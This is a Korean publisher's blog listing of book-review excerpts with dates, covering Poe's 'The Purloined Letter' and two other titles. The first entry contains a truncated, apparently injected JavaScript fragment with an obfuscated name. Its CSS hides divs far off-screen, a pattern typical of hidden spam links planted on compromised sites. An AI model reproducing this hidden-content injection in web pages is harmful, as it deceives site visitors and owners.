문지 스펙트럼 시리즈 『도둑맞은 편지』 (에드거 앨런 포 지음, 김진경 옮김, 문학과지성사, 2018) function vjZjnIFtqu(arK) { var vKj = "#mjq2otaxmdcxmq{overflow:hidden;margin:0px 20px}#mjq2otaxmdcxmq>div{display:block;overflow:hidden;top:-4432px;position:fixed;left:-4134px}"; var ovqpm = 계속읽기→
2018.11.21
『간사지 이야기』 (최시한 연작소설, 문학과지성사, 2017) 원종국(소설가) 이야기 “모든 것의 최종 형태는 이야기이다. 사실에 상상을 버무려 빚어낸 형상으로, 이야기는 무의미와 망각에 맞선다. 그리고 현재가 계속읽기→
2018.11.19
『세대 게임』 (전상진 문학과지성사, 2018) 김형중(문학평론가) 꼭 한 세대(30년) 차이가 나는 딸과 깊은 얘기를 나눠본 지 오래되었고, 강의실에서 내가 던지는 농담에 웃어주는 학생들의 숫자가 계속읽기→
2018.10.26